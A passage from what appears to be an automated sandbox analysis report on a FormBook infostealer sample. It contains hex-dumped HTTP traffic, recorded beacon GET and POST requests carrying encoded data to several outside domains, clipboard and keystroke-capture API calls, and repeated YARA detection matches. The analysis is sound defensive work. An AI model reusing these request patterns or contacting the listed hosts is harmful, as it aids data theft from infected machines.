65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 36 37 45 38 45 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 62 61 73 65 2d 63 6f 6c 6f 72 3a 20 23 30 30 35 42 37 30 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 61 72 72 6f 77 2d 63 6f 6c 6f 72 3a 20 23 46 33 39 36 30 42 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 44 61 72 6b 53 68 61 64 6f 77 2d 43 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 20 7b 20 63 6f 6c 6f 72 3a 23 30 32 31 66 32 35 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 42 39 38 30 32 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 73 79 73 5f 63 70 61 6e 65 6c 2f 69 6d 61 67 65 73 2f 62 6f 74 74 6f 6d 62 6f 64 79 2e 6a 70 67 29 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 72 65 70 65 61 74 2d 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 3a 35 70 78 20 30 20 31 30 70 78 20 31 35 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:10:50 GMTServer: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635Accept-Ranges: bytesConnection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 35 37 39 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 36 37 45 38 45 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 62 61 73 65 2d 63 6f 6c 6f 72 3a 20 23 30 30 35 42 37 30 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 61 72 72 6f 77 2d 63 6f 6c 6f 72 3a 20 23 46 33 39 36 30 42 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 44 61 72 6b 53 68 61 64 6f 77 2d 43 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 20 7b 20 63 6f 6c 6f 72 3a 23 30 32 31 66 32 35 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 42 39 38 30 32 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 73 79 73 5f 63 70 61 6e 65 6c 2f 69 6d 61 67 65 73 2f 62 6f 74 74 6f 6d 62 6f 64 79 2e 6a 70 67 29 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 72 65 70 65 61 74 2d 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 3a 35 70 78 20 30 20 31 30 70 78 20 31 35 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:10:56 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:10:58 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: netsh.exe, 00000005.00000002.565764534.0000000003B56000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://code.jquery.com/jquery-3.3.1.min.js
          Source: netsh.exe, 00000005.00000002.565764534.0000000003B56000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://gmpg.org/xfn/11
          Source: qHpeBvr9cR.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: qHpeBvr9cR.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000003.00000000.356156439.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.336262975.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.303735560.000000000091F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: -ODfqI49.5.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: -ODfqI49.5.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: -ODfqI49.5.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: -ODfqI49.5.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: -ODfqI49.5.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: -ODfqI49.5.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: -ODfqI49.5.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: -ODfqI49.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: -ODfqI49.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: -ODfqI49.5.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: netsh.exe, 00000005.00000002.565816613.0000000003CE8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.lyonfinancialusa.com/henz/?ChMxG4C=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIsz
          Source: unknownHTTP traffic detected: POST /henz/ HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.lyonfinancialusa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lyonfinancialusa.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 68 4d 78 47 34 43 3d 46 5f 54 33 34 4d 43 59 37 4c 4c 6c 35 30 36 46 70 55 6d 45 4c 6d 56 30 6d 31 6d 41 7e 59 47 31 45 72 5a 72 7a 51 72 43 4f 57 4d 4c 57 30 50 39 66 6d 38 71 30 51 56 44 6d 5a 39 4b 58 4c 58 59 43 47 67 65 67 44 28 54 4b 77 71 30 79 6a 6f 58 48 68 65 62 75 32 37 65 5a 42 62 45 69 45 6b 62 33 42 53 6a 35 64 4f 6e 57 42 38 78 4b 44 71 48 63 52 32 4b 48 38 32 37 68 43 41 6c 51 79 65 4e 57 59 50 55 32 4c 59 59 6e 75 74 6f 58 35 49 43 7a 65 73 58 73 41 4b 7a 4d 4c 79 53 41 5f 6b 2d 45 50 64 50 77 38 64 65 49 50 47 6b 52 4f 65 51 4c 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ChMxG4C=F_T34MCY7LLl506FpUmELmV0m1mA~YG1ErZrzQrCOWMLW0P9fm8q0QVDmZ9KXLXYCGgegD(TKwq0yjoXHhebu27eZBbEiEkb3BSj5dOnWB8xKDqHcR2KH827hCAlQyeNWYPU2LYYnutoX5ICzesXsAKzMLySA_k-EPdPw8deIPGkROeQLw).
          Source: unknownDNS traffic detected: queries for: www.eufidelizo.com
          Source: global trafficHTTP traffic detected: GET /henz/?ChMxG4C=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692MpWFmEiKCsF21Xzw==&8p08qr=2d0X HTTP/1.1Host: www.eufidelizo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?ChMxG4C=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIszhxIs75pfZv/CVEdhBuwKxvuqF4TRlzZl0jGQ0nXo34yzw==&8p08qr=2d0X HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?ChMxG4C=8TptbrIX6F4NxrWdTDNRTBReo0fMEuELv5cUeaX5N5UPFd9Hxy/eTVHt8QapNK2qZdoBzpjQ3MhBnX7XpU/ZSQN3PeXGVgYZcA==&8p08qr=2d0X HTTP/1.1Host: www.afterdarksocial.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?ChMxG4C=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYBdz817Owqh44+wA==&8p08qr=2d0X HTTP/1.1Host: www.patrickguarte.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B1ACA0 OpenClipboard,GetClipboardData,GlobalLock,GlobalSize,VkKeyScanW,MapVirtualKeyW,GlobalUnlock,CloseClipboard,1_2_00B1ACA0
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B1B830 GetKeyboardState,1_2_00B1B830
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeCode function: 0_2_00405125 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405125

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: febcldoukq.exe PID: 5828, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: netsh.exe PID: 5920, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: qHpeBvr9cR.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
